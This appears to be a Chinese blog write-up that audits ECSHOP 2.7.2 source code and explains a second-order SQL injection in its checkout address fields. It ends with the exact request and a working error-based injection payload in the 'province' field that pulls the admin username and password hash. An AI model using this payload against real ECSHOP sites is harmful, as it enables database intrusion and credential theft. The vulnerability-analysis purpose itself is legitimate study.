首页 > 代码库 > ECSHOP 2.7.2二次注入分析

ECSHOP 2.7.2二次注入分析

这是一个很老的漏洞了。最近学习代码审计在乌云上看到的,作者只给了部分分析,和利用的exp。

0x1代码分析

漏洞出现在flow.php

在flow.php的372行有如下代码

{
        /*
         * 保存收货人信息
         */
        $consignee = array(
            ‘address_id‘    => empty($_POST[‘address_id‘]) ? 0  : intval($_POST[‘address_id‘]),
            ‘consignee‘     => empty($_POST[‘consignee‘])  ? ‘‘ : trim($_POST[‘consignee‘]),
            ‘country‘       => empty($_POST[‘country‘])    ? ‘‘ : $_POST[‘country‘],
            ‘province‘      => empty($_POST[‘province‘])   ? ‘‘ : $_POST[‘province‘],
            ‘city‘          => empty($_POST[‘city‘])       ? ‘‘ : $_POST[‘city‘],
            ‘district‘      => empty($_POST[‘district‘])   ? ‘‘ : $_POST[‘district‘],
            ‘email‘         => empty($_POST[‘email‘])      ? ‘‘ : $_POST[‘email‘],
            ‘address‘       => empty($_POST[‘address‘])    ? ‘‘ : $_POST[‘address‘],
            ‘zipcode‘       => empty($_POST[‘zipcode‘])    ? ‘‘ : make_semiangle(trim($_POST[‘zipcode‘])),
            ‘tel‘           => empty($_POST[‘tel‘])        ? ‘‘ : make_semiangle(trim($_POST[‘tel‘])),
            ‘mobile‘        => empty($_POST[‘mobile‘])     ? ‘‘ : make_semiangle(trim($_POST[‘mobile‘])),
            ‘sign_building‘ => empty($_POST[‘sign_building‘]) ? ‘‘ : $_POST[‘sign_building‘],
            ‘best_time‘     => empty($_POST[‘best_time‘])  ? ‘‘ : $_POST[‘best_time‘],
        );

        if ($_SESSION[‘user_id‘] > 0)
        {
            include_once(ROOT_PATH . ‘includes/lib_transaction.php‘);

            /* 如果用户已经登录,则保存收货人信息 */
            $consignee[‘user_id‘] = $_SESSION[‘user_id‘];

            save_consignee($consignee, true);   //进入save_consignee函数
        }

跟踪save_consignee函数,在includes/lib_transaaction.php的516行

function save_consignee($consignee, $default=false)
{
    if ($consignee[‘address_id‘] > 0)
    {
        /* 修改地址 */
        $res = $GLOBALS[‘db‘]->autoExecute($GLOBALS[‘ecs‘]->table(‘user_address‘), $consignee, ‘UPDATE‘, ‘address_id = ‘ . $consignee[‘address_id‘]);
    }
    else
    {
        /* 添加地址 */
        $res = $GLOBALS[‘db‘]->autoExecute($GLOBALS[‘ecs‘]->table(‘user_address‘), $consignee, ‘INSERT‘);
        $consignee[‘address_id‘] = $GLOBALS[‘db‘]->insert_id();
    }

    if ($default)
    {
        /* 保存为用户的默认收货地址 */
        $sql = "UPDATE " . $GLOBALS[‘ecs‘]->table(‘users‘) .
            " SET address_id = ‘$consignee[address_id]‘ WHERE user_id = ‘$_SESSION[user_id]‘";

        $res = $GLOBALS[‘db‘]->query($sql);
    }

    return $res !== false;
}
/*从代码可以看出我们POST过来的数据进入了数据库*/

我们跟踪下province变量的去处。

看到第527行,有如下代码

$region =  array($consignee[‘country‘], $consignee[‘province‘], $consignee[‘city‘], $consignee[‘district‘]);
    $shipping_list     = available_shipping_list($region);
    $cart_weight_price = cart_weight_price($flow_type);
    $insure_disabled   = true;
    $cod_disabled      = true;

可以看到数据都放到$region这个数组里面来了,我们继续跟踪$region

然后看到如下代码

$order = array(
        ‘shipping_id‘     => intval($_POST[‘shipping‘]),
        ‘pay_id‘          => intval($_POST[‘payment‘]),
        ‘pack_id‘         => isset($_POST[‘pack‘]) ? intval($_POST[‘pack‘]) : 0,
        ‘card_id‘         => isset($_POST[‘card‘]) ? intval($_POST[‘card‘]) : 0,
        ‘card_message‘    => trim($_POST[‘card_message‘]),
        ‘surplus‘         => isset($_POST[‘surplus‘]) ? floatval($_POST[‘surplus‘]) : 0.00,
        ‘integral‘        => isset($_POST[‘integral‘]) ? intval($_POST[‘integral‘]) : 0,
        ‘bonus_id‘        => isset($_POST[‘bonus‘]) ? intval($_POST[‘bonus‘]) : 0,
        ‘need_inv‘        => empty($_POST[‘need_inv‘]) ? 0 : 1,
        ‘inv_type‘        => $_POST[‘inv_type‘],
        ‘inv_payee‘       => trim($_POST[‘inv_payee‘]),
        ‘inv_content‘     => $_POST[‘inv_content‘],
        ‘postscript‘      => trim($_POST[‘postscript‘]),
        ‘how_oos‘         => isset($_LANG[‘oos‘][$_POST[‘how_oos‘]]) ? addslashes($_LANG[‘oos‘][$_POST[‘how_oos‘]]) : ‘‘,
        ‘need_insure‘     => isset($_POST[‘need_insure‘]) ? intval($_POST[‘need_insure‘]) : 0,
        ‘user_id‘         => $_SESSION[‘user_id‘],
        ‘add_time‘        => gmtime(),
        ‘order_status‘    => OS_UNCONFIRMED,
        ‘shipping_status‘ => SS_UNSHIPPED,
        ‘pay_status‘      => PS_UNPAYED,
        ‘agency_id‘       => get_agency_by_regions(array($consignee[‘country‘], $consignee[‘province‘], $consignee[‘city‘], $consignee[‘district‘]))
        );

数据进入了get_agency_by_regions函数,我们跟进去看看。

来到includes\lib_order.php 第2124行代码

看到此函数的定义

function get_agency_by_regions($regions)
{
    if (!is_array($regions) || empty($regions))
    {
        return 0;
    }

    $arr = array();
    $sql = "SELECT region_id, agency_id " .
            "FROM " . $GLOBALS[‘ecs‘]->table(‘region‘) .
            " WHERE region_id " . db_create_in($regions) .
            " AND region_id > 0 AND agency_id > 0"; //进入数据库了。
    $res = $GLOBALS[‘db‘]->query($sql);
    while ($row = $GLOBALS[‘db‘]->fetchRow($res))
    {
        $arr[$row[‘region_id‘]] = $row[‘agency_id‘];
    }
    if (empty($arr))
    {
        return 0;
    }

    $agency_id = 0;
    for ($i = count($regions) - 1; $i >= 0; $i--)
    {
        if (isset($arr[$regions[$i]]))
        {
            return $arr[$regions[$i]];
        }
    }
}

其中$region被传入到db_create_in函数中。继续跟踪db_create_in函数

再includes\lib_common.php发现该函数的定义

function db_create_in($item_list, $field_name = ‘‘)
{
    if (empty($item_list))
    {
        return $field_name . " IN (‘‘) "; 
    }
    else
    {
        if (!is_array($item_list))   //如果$item_list不是数组
        {
            $item_list = explode(‘,‘, $item_list); //用逗号分隔为数组
        }
        $item_list = array_unique($item_list);  //去除数组中重复的值
        $item_list_tmp = ‘‘;
        foreach ($item_list AS $item)  //循环遍历 $item_list 里的数据
        {
            if ($item !== ‘‘)   
            {
                $item_list_tmp .= $item_list_tmp ? ",‘$item‘" : "‘$item‘";
            }
        }
        if (empty($item_list_tmp)) //如果$item_list_tmp为空
        {
            return $field_name . " IN (‘‘) ";  //直接返回 id IN (‘‘)
        }
        else
        {
            return $field_name . ‘ IN (‘ . $item_list_tmp . ‘) ‘;
        }
    }
}

可以看到$region数组传进去后返回了‘ IN (‘ . $item_list_tmp . ‘) ‘ 虽然此处有单引号括起来了。但是,没有影响的。因为此处是二次注入。当数据进入mysql后转义字符会被去除。

所以完全不受GPC的影响。

0x2漏洞利用

把任意商品加入购物车在填写配送地址那一页,有地区选择
flow.php?step=consignee&direct_shopping=1
比如省选择安徽

其中POST数据如下

country=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111
&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80
&step=consignee&act=checkout&address_id=

province=3

改成

province=3‘) and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) 
from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #

这样就注入完成了。